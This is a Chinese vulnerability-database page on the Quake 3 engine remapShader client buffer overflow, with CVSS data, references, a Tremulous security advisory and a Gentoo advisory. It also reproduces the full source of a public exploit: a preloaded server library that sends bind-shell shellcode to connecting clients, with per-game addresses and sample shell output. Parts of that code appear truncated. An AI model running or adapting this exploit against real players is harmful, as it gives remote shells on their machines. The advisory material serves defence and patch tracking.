发布时间 :2006-05-08 19:02:00
修订时间 :2017-10-18 21:29:07

[原文]Buffer overflow in the Quake 3 Engine, as used by (1) ET 2.60, (2) Return to Castle Wolfenstein 1.41, and (3) Quake III Arena 1.32b allows remote attackers to execute arbitrary commands via a long remapShader command.

[CNNVD]Quake 3引擎 remapShader命令 远程缓冲区溢出漏洞(CNNVD-200605-117)

        Quake 3引擎是ID Software开发的游戏引擎,很多游戏都在使用。
        Quake 3引擎在处理命令请求时存在缓冲区溢出漏洞,如果向Quake 3引擎的remapShader命令的发送了特制参数的话,就会触发缓冲区溢出,导致执行任意代码或拒绝服务。

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20060508 Two independent vulnerabilities (client and server side) in Quake3 engine and many derived games
(UNKNOWN)  BID  17857
(UNKNOWN)  VUPEN  ADV-2006-1676
(UNKNOWN)  XF  quake3-remapshader-client-bo(26264)

- 漏洞信息

Quake 3引擎 remapShader命令 远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-05-08 00:00:00 2006-05-09 00:00:00
        Quake 3引擎是ID Software开发的游戏引擎,很多游戏都在使用。
        Quake 3引擎在处理命令请求时存在缓冲区溢出漏洞,如果向Quake 3引擎的remapShader命令的发送了特制参数的话,就会触发缓冲区溢出,导致执行任意代码或拒绝服务。

- 公告与补丁


- 漏洞信息 (1750)

Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit (EDBID:1750)
linux remote
2006-05-05 Verified
0 landser
N/A [点击下载]
// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit
// by landser - landser at
// this code works as a preloaded shared library on a game server,
// it hooks two functions on the running server:
// svc_directconnect() that is called when a client connects,
// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients.
// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message.
// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro)
// (win32 clients are vuln too but not included here)
// usage:
// gcc remap_this.c -shared -fPIC -o
// and run a server with env LD_PRELOAD="./"
// -----------------------------------------------------
// [luser@box ~/wolfenstein]$ LD_PRELOAD="./" ./wolfded.x86 +set net_port 5678 +map mp_beach
// remap_this.c by landser - landser at
// game: RtCW 1.41 Dedicated.
// [...]
// directconnect(): connected
// sendservercommand() called
// sendservercommand() called
// sendservercommand() called
// [...]
// [luser@box ~/wolfenstein]$ nc 27670 -vv
// sus4 [] 27670 (?) open
// id
// uid=1000(luser) gid=100(lusers)
// -----------------------------------------------------
// visit for open source linux cheats

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <dlfcn.h>
#include <sys/mman.h>

#define SILENT // hide the crappy server output
#define PORT 27670 // bindshell port. some values are invalid

struct netaddr { // from q3-1.32b/qcommon/qcommon.h
	int type;
	unsigned char ip[4];
	unsigned char ipx[10];
	unsigned short port;

struct {
	char *name;
	char *fn;
	unsigned long retaddr;	// something that jumps to %esp
	unsigned long sendservercommand; // address of sv_sendservercommand()
	unsigned long directconnect; // address of svc_directconnect()
	int hooklen; // for both sendservercommand and directconnect
	unsigned long errormsg; // address of error string
	unsigned long comerror; // address of com_error()
	int popas; // num of popa instructions before shellcode
	int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction
} games[] = {
	{"ET 2.60 Dedicated",		"etded",
		0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12},
	{"RtCW 1.41 Dedicated",		"wolfded",
		0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12},
	{"Quake 3 1.32b Dedicated",	"q3ded",
		0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27},

const int ngames = sizeof(games) / sizeof(games[0]);
const unsigned short int port = PORT;

static void *hook (void *, int, void *);
static void sendservercommand (void *, const char *, ...);
static void directconnect (struct netaddr);
static void writebuf (void);

void (*_sendservercommand)(void *, const char *, ...);
void (*_directconnect)(struct netaddr);

int c = -1;
unsigned char buf[1024];

// shellcode (286 bytes):
// fork()s,
// the parent proc calls com_error() with an error message (errormsg var),
// the child proc binds a shell on a chosen port
// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80
unsigned char sc[] =
	"\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01"
	"\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM"

void __attribute__ ((constructor)) init (void) {
	char buf[256];
	int ret;
	printf("remap_this.c by landser - landser at\n\n");

	ret = readlink("/proc/self/exe", buf, sizeof buf);
	if (ret < 0) {
	buf[ret] = '\0';

	for (c=0;c<ngames;c++)
		if (strstr(buf, games[c].fn)) break;
	if (c == ngames) {
		printf("binary doesnt match any of the targets.\n");
	printf("game: %s.\n\n", games[c].name);


	_sendservercommand = hook((void *)games[c].sendservercommand, games[c].hooklen, &sendservercommand);
	_directconnect = hook((void *)games[c].directconnect, games[c].hooklen, &directconnect);

int fputs (const char *s, FILE *fp) {
	static int (*_fputs)(const char *, void *);
	if (!_fputs) _fputs = dlsym(RTLD_NEXT, "fputs");

#ifdef SILENT
	if (strncmp(s, "---", 3)) return 1;

	return _fputs(s, fp);

static void sendservercommand (void *client, const char *fmt, ...) {
	printf("sendservercommand() called\n");
	_sendservercommand(client, "%s", buf);

static void directconnect (struct netaddr addr) {
	printf("directconnect(): %d.%d.%d.%d connected\n",
		addr.ip[0], addr.ip[1], addr.ip[2], addr.ip[3]);

static void writebuf (void) {
	unsigned char *cm1, *cm2, *ptr = buf;
	int i, b;

	strcpy(ptr, "remapShader ");
	if (strstr(games[c].name, "Quake")) strcat(ptr, "j w ");
	strcat(ptr, "\"");
	ptr += strlen(ptr);

	memset(ptr, '\b', 76);
	ptr += 76;

	memcpy(ptr, &games[c].retaddr, 4);
	ptr += 4;

	if (strstr(games[c].name, "Quake")) {
		// replaces %ebp with %esp without using the stack
		memcpy(ptr, "\x33\x2f\x31\x2f\x31\x27\x33\x27\x31\x27", 10);
		ptr += 10;

	memset(ptr, 0x61, games[c].popas); // 'popa' instructions
	ptr += games[c].popas;

	memcpy(ptr, sc, sizeof(sc));
	memset(ptr + strlen(ptr) - 3, games[c].gap, 1);
	memset(ptr + strlen(ptr) - 1, games[c].gap - 2, 1);

	cm1 = strstr(ptr, "CM1");
	cm2 = strstr(ptr, "CM2");
	if (!cm1 || !cm2) abort();
	for (i=0;i<3;i++) {
		b = (games[c].comerror >> (8*i)) & 0xff;
		if ((b-1) >= 0x7f) {
			cm1[i] = 0x6b;
			cm2[i] = b - 0x6b;
		else {
			cm1[i] = b - 1;
			cm2[i] = 1;

	ptr = strstr(ptr, "PORT");
	if (!ptr) abort();
	memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32
	memcpy(ptr+2, &port, sizeof port);
	ptr = strstr(ptr, "ERRM");
	if (!ptr) abort();
	memcpy(ptr, &games[c].errormsg, 4);

	strcat(ptr, "\"");
	if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w");

#define PAGE(x) (void *)((unsigned long)x & 0xfffff000)

static void *hook (void *hfunc, int len, void *wfunc) {
        void *newmem = malloc(len+5);
	long rel32;

	// copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it
        memcpy(newmem, hfunc, len);
	memset(newmem+len, 0xe9, 1); // e9 - jmp rel32
	rel32 = hfunc - (newmem+5);
	memcpy(newmem+len+1, &rel32, sizeof rel32);

	// make 'hfunc's address writable & executable
	mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
	// change the start of 'hfunc' to a 'jmp *wfunc' instruction
	memset(hfunc, 0xe9, 1); // e9 - jmp rel32
        rel32 = wfunc - (hfunc+5);
	memcpy(hfunc+1, &rel32, sizeof rel32);

        return newmem;

// [2006-05-05]

- 漏洞信息 (F110095)

Tremulous Inherited Issues (PacketStormID:F110095)
2012-02-23 00:00:00
Simon McVittie  

Tremulous, a team based FPS game with RTS elements, suffers from a large amount of old Quake related vulnerabilities.


Tremulous is a team-based FPS game with RTS elements. Its engine and
game logic are based on the GPL source release of the Quake III Arena
engine and game logic by id Software.

The de facto upstream developer of the Quake III engine is now another
fork, ioquake3; in particular, ioquake3 fixes many security
vulnerabilities present in the original Quake III Arena source release.
Unlike (for instance) OpenArena or Urban Terror, Tremulous has diverged
from the original Quake III Arena engine, so it cannot be played using
an unmodified ioquake3 engine.

The Tremulous website advertises two versions of the game:

* 1.1.0, a stable release (released 2006-03-31). This is packaged
  in Debian/Ubuntu stable releases, and also appears to be packaged
  in FreeBSD, openSUSE and Gentoo.

* GPP1 ("Gameplay Preview 1"), a preview release (2009-12-03) of
  what will eventually become Tremulous 1.2. This
  appears to be packaged in Fedora stable releases.

In addition, there are several unofficial engine updates compatible with
1.1.0, notably a backport by Tony White (TJW), and a set of updated
client and server provided by Mercenaries' Guild. These are not
publicized by the main Tremulous website, but they are apparently
popular with players, and their functionality has been incorporated into
version 1.2 development.


Numerous security vulnerabilities have been reported and fixed in
ioquake3 since its initial release. Neither Tremulous 1.1.0 nor GPP1
incorporates fixes for all of these vulnerabilities.

I believe this table is more or less accurate, but I have only checked
Tremulous 1.1.0 in detail. If you ship one of the other versions, you
will need to do your own checks.

               Trem-1.1.0    MGC-1.011    MGS-1.01     tjw    Trem-GPP1
CVE-2001-1289       OK           OK           OK        OK       OK
CVE-2005-0430       OK           OK           OK        OK       OK
CVE-2005-0983       OK           OK           OK        OK       OK
CVE-2006-2082       Vuln         n/a          ?         Vuln     OK
CVE-2006-2236       Vuln         OK           n/a       OK       OK
CVE-2006-2875       Vuln         OK           n/a       OK       OK
CVE-2006-3324       Vuln         OK           n/a       Vuln     OK
CVE-2006-3325       Vuln         OK           n/a       Vuln     OK
CVE-2006-3400       OK           OK           OK        OK       OK
CVE-2006-3401       OK           OK           OK        OK       OK
CVE-2011-1412       OK           OK           OK        OK       OK
CVE-2011-2674       Vuln         Vuln         n/a       Vuln     Vuln
CVE-2011-3012       Vuln         OK           n/a       Vuln     OK

(For completeness, the table lists all CVE IDs I've found listed for
either Quake III Arena or ioquake3.)

Key: Trem-1.1.0 = Tremulous 1.1.0 (2006-03-31)
     MGC-1.011 = MercenariesGuild client 1.011 when used as a client
     MGS-1.01 = MercenariesGuild server 1.01 when used as a server
     tjw =
     Trem-GPP1 = Tremulous Gameplay Preview 1 (1.2 prerelease,

     Vuln = vulnerable
     partial = partial fix, probably still vulnerable
     n/a = server-specific bug not applicable to client or vice versa

In addition, searching ioquake3 commit history reveals a number of
commits which do not appear to be related to a CVE number, but could be
security-sensitive. I have not analyzed which of these could affect the
Tremulous engine. If you cause a new CVE number to be assigned for any
changes made to ioquake3 in the past (as was done for CVE-2011-3012),
please include a prominent reference to the relevant svn revision in any
advisory, so that CVE numbers can be correlated with the changes required.

Finally, to the best of my knowledge, ioquake3 upstream do not consider
the QVM bytecode interpreter to be safe for use with untrusted bytecode;
this means that auto-downloading (cl_allowDownload 1) is not considered
to be safe under any circumstances. This is particularly the case for
engines which do not have the interpreter/JIT hardening work that was
done in ioquake3 at svn revisions around 1687, 1717 and 2000, none of
which is present in at least Tremulous 1.1.0.


I have not received any response from Tremulous developers since I
contacted them privately 1 month ago.

Distributions like Debian, Fedora and Ubuntu should either fix the open
vulnerabilities, or remove affected Tremulous versions from their
repositories entirely.

I have uploaded tremulous 1.1.0-7 to Debian, with backports of the
various CVE fixes from ioquake3, and some additional pre-emptive changes
for potential bugs which are not known to be exploitable (avoiding
non-constant format strings and sprintf() into a fixed-length buffer).
Patches which I believe to be correct are available at
or by cloning the git repository
<git://>. Please contact me
via the Debian bug tracking system or the Games Team mailing list
<> with testing results or
corrections for these patches.

I believe that long-term-supported distributions should also mitigate
any future vulnerabilities in the ioquake3 bytecode interpreter by
removing client-side support for auto-downloading (always behaving as if
configured with cl_allowDownload 0) in their stable releases. I have
made this change in Debian's tremulous 1.1.0-7 package, but not yet in
Debian's ioquake3 package.


- 漏洞信息 (F73735)

Gentoo Linux Security Advisory 200901-6 (PacketStormID:F73735)
2009-01-12 00:00:00

Gentoo Linux Security Advisory GLSA 200901-06 - A buffer overflow vulnerability has been discovered in Tremulous. It has been reported that Tremulous includes a vulnerable version of the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236). Versions less than 1.1.0-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200901-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     Severity: Normal
        Title: Tremulous: User-assisted execution of arbitrary code
         Date: January 11, 2009
         Bugs: #222119
           ID: 200901-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


A buffer overflow vulnerability has been discovered in Tremulous.


Tremulous is a team-based First Person Shooter game.

Affected packages

        Package                  /  Vulnerable  /              Unaffected
     1  games-fps/tremulous         < 1.1.0-r2                >= 1.1.0-r2
     2  games-fps/tremulous-bin       < 1.1.0                 Vulnerable!
        NOTE: Certain packages are still vulnerable. Users should migrate
              to another package if one is available or wait for the
              existing packages to be marked stable by their
              architecture maintainers.
        2 affected packages on all of their supported architectures.


It has been reported that Tremulous includes a vulnerable version of
the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236).


A remote attacker could entice a user to connect to a malicious games
server, possibly resulting in the execution of arbitrary code with the
privileges of the user running the application.


There is no known workaround at this time.


Tremulous users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=games-fps/tremulous-1.1.0-r2"

Note: The binary version of Tremulous has been removed from the Portage


     [ 1 ] CVE-2006-2236
     [ 2 ] GLSA 200605-12


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:


Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to or alternatively, you may file a bug at


Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.


- 漏洞信息

Quake 3 Engine remapShader Command Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in the Quake 3 Engine. The Quake 3 Engine fails to perform proper bounds checking of the 'remapShader' command resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-05-05 Unknow
2006-05-05 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Quake 3 Engine remapShader Command Remote Buffer Overflow Vulnerability
Boundary Condition Error 17857
Yes No
2006-05-05 12:00:00 2010-05-17 06:52:00
Discovery is credited to landser <>.

- 受影响的程序版本

Red Hat Fedora 13
Red Hat Fedora 12
id Software Wolfenstein: Enemy Territory 2.60
id Software Return to Castle Wolfenstein 1.41
id Software Quake 3 Engine 1.32 b
id Software Quake 3 Arena 1.32 b
Gentoo Linux
id Software Wolfenstein: Enemy Territory 2.60b
id Software Return to Castle Wolfenstein 1.41b
id Software Quake 3 Arena 1.32c

- 不受影响的程序版本

id Software Wolfenstein: Enemy Territory 2.60b
id Software Return to Castle Wolfenstein 1.41b
id Software Quake 3 Arena 1.32c

- 漏洞讨论

The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of affected game clients. Failed exploit attempts will likely crash affected clients.

This vulnerability reportedly affects the following games:
- Quake 3 Arena
- Return to Castle Wolfenstein
- Wolfenstein: Enemy Territory

Other games may also be affected.

- 漏洞利用

The following exploit is available:

- 解决方案

id Software has released patches. Please see references for details.

id Software Quake 3 Arena 1.32 b

id Software Return to Castle Wolfenstein 1.41

id Software Wolfenstein: Enemy Territory 2.60

- 相关参考